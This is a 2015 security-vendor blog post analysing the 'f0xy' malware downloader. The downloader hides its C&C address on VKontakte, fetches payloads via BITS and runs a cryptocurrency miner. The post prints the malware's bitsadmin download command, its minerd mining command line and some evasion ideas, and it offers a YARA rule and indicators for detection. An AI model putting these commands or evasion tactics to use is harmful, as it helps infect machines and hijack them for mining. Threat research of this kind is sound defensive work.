January 29, 2015

New 'f0xy' malware is intelligent - employs cunning stealth & trickery

Nicholas Griffin Security Researcher

Websense Security Labs have discovered a new and emerging malware downloader that employs evasion techniques and downloads a cryptocurrency miner. The new malware, which we have named 'f0xy', is able to dynamically change its command-and-control (C&C), and download and execute arbitrary files. More interestingly, f0xy's evasion tactics include leveraging the popular Russian social networking site VKontakte, and employing Microsoft's Background Intelligent Transfer Service to download files. 

The behavior of f0xy backs up our 2015 security predictions that cybercriminals will continue to hide their C2 infrastructure within legitimate websites. We believe that this will be a growing trend in 2015, as malware authors realize that detecting malicious intent on legitimate websites can be difficult for security vendors. 

Websense customers are protected against this threat with ACE, our Advanced Classification Engine, at the different stages of the attack detailed below: 

  • Stage 5 (Dropper) – ACE has detection for malicious files used in this campaign, including detection of the malicious behavior utilized by f0xy.
  • Stage 6 (Call Home) – ACE detects the communication to the C&C points associated with the f0xy downloader.

File Sandbox report for the f0xy downloader dropper file: http://csi.websense.com/ThreatScope/FileAnalysis?requestId=ddf3d016-d8ac-4220-969e-a42f002a0039

Hunting Down f0xy

When we took a closer look at the malware, we saw only 5/57 detections by security vendors for the initial dropper file f522e0893ec97438c6184e13adc48219f08b67d8.

Upon investigating the C&C infrastructure, further samples were found dating back to 13 January 2015. Analysis suggests that the malware author has been changing and improving the code for reliability and efficiency, and to arrive at a version that works on most operating systems. First versions of the malware will run only on Windows 6.0 (Vista) and above, while the newer versions will also run on Windows XP.

We decided to name the malware 'f0xy' due to the strings found in the executables, and the registry key it creates for persistence.

To date, we have not seen any evidence in our customer base of an attempt to infect a machine with f0xy. Websense Security Labs will continue to monitor the campaign, because we may see it targeting users in the near future.

Stealth & Evasion Tactics

Just as a real fox is known in many cultures for its cunning and trickery, so is the malware. There are three distinctive features that allow the malware to fly under the radar:

  1. The malware employs very little in the way of code and string obfuscation, in order to appear more legitimate and hide in plain sight. 
  2. A request is made to the Russian social networking site VKontakte, where the address of the real C&C is hidden.
  3. Finally, the malware uses Microsoft's Background Intelligent Transfer service to outsource its network traffic, to avoid detection from security products.

While there is little in the way of obfuscation within the malware itself, we can see a base64 encoded string located in the midst of some HTTP strings:

Decoding the string results in a VKontakte user profile's 'wall' URL:


Executing the malware confirms that a request to this URL is made, with another base64 encoded string found as one of the comments on the user profile wall:


Decoding this one reveals the C&C URLs:


Analysis of subsequent network traffic and the behavior of the malware tells us that the <get> URL is responsible for obtaining an identifier to use for further requests, the <job> URL is responsible for asking the C&C what to do, and the<knock> URL is responsible for initially checking into the C&C, reporting information about the current environment where the malware is running, and optionally receiving a response back that tells it to download another version of the malware.

Leveraging the Microsoft Background Intelligent Transfer Service

The f0xy downloader calls upon bitsadmin.exe to download its payloads, which is the Microsoft Background Intelligent Transfer Service (BITS). BITS provides a way of using idle bandwidth to perform file transfers, meaning that bandwidth requirements from other applications are not interrupted or interfered with. Many Windows services rely upon this service, including Windows Update and Windows Defender.

The malware assigns the BITS job name "Download_f0xy" when performing these transfers, and specifies where to download the files:

bitsadmin /transfer Download_f0xy hxxp://" "C:\Documents and Settings\user\Application Data\Microsoft\f0xyupdate.exe"

Presumably the main reason for using BITS is to prevent security products from flagging its behavior as suspicious, because anti-malware solutions are much less likely to have a problem with bitsadmin.exe performing network requests than an unknown executable. However, this process could be made even more stealthy by interacting with BITS through its Component Object Model (COM) interface, instead of calling upon the executable directly.

Financial Motivation

Websense Security Labs have observed f0xy downloading a 64-bit version of the cryptocurrency miner CPUMiner. The miner is executed by f0xy with the following command line:

minerd -o stratum+tcp://EU.coinmine.pw:1111 -u sorted -p x

CoinMine.pw is a cryptocurrency mining service for multiple currencies, and allows a user to name 'workers' that can pool together to mine on behalf of a user's account. We can see from this command line that the worker name sorted is used, which presumably belongs to the malware actor distributing f0xy. The more machines infected by f0xy and mining under this worker name, the more potential cryptocurrency can be mined for the cybercriminal.

Indicators of Compromise

The following are indicators of a compromised machine:

Sample SHA1s













Network Traffic


File Names


Registry Keys

Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceName:f0xy


The following YARA rule can be used to hunt for more samples:

rule ws_f0xy_downloader {


        description = "f0xy malware downloader"

        author = "Nick Griffin (Websense)"



         $string1="bitsadmin /transfer"

         $string2="del rm.bat"



         ($mz at 0) and (all of ($string*))



It is clear that financial motivations remain at the forefront of cybercriminal minds, with the anonymity of cryptocurrency providing a somewhat safer route for collecting the spoils. We also expect to see a continuing growth of malware authors migrating to legitimate and reputable websites, to hide their malicious activities, and we expect plenty more evasion tactics adopted as authors continue to subvert security products. We have configured our ThreatSeeker® Intelligence Cloud to look for more indicators of compromise, and we use tools like Yara to supplement our own analytics.

Blog author: Nick Griffin

About Forcepoint

Forcepoint is the leading user and data protection cybersecurity company, entrusted to safeguard organizations while driving digital transformation and growth. Our solutions adapt in real-time to how people interact with data, providing secure access while enabling employees to create value.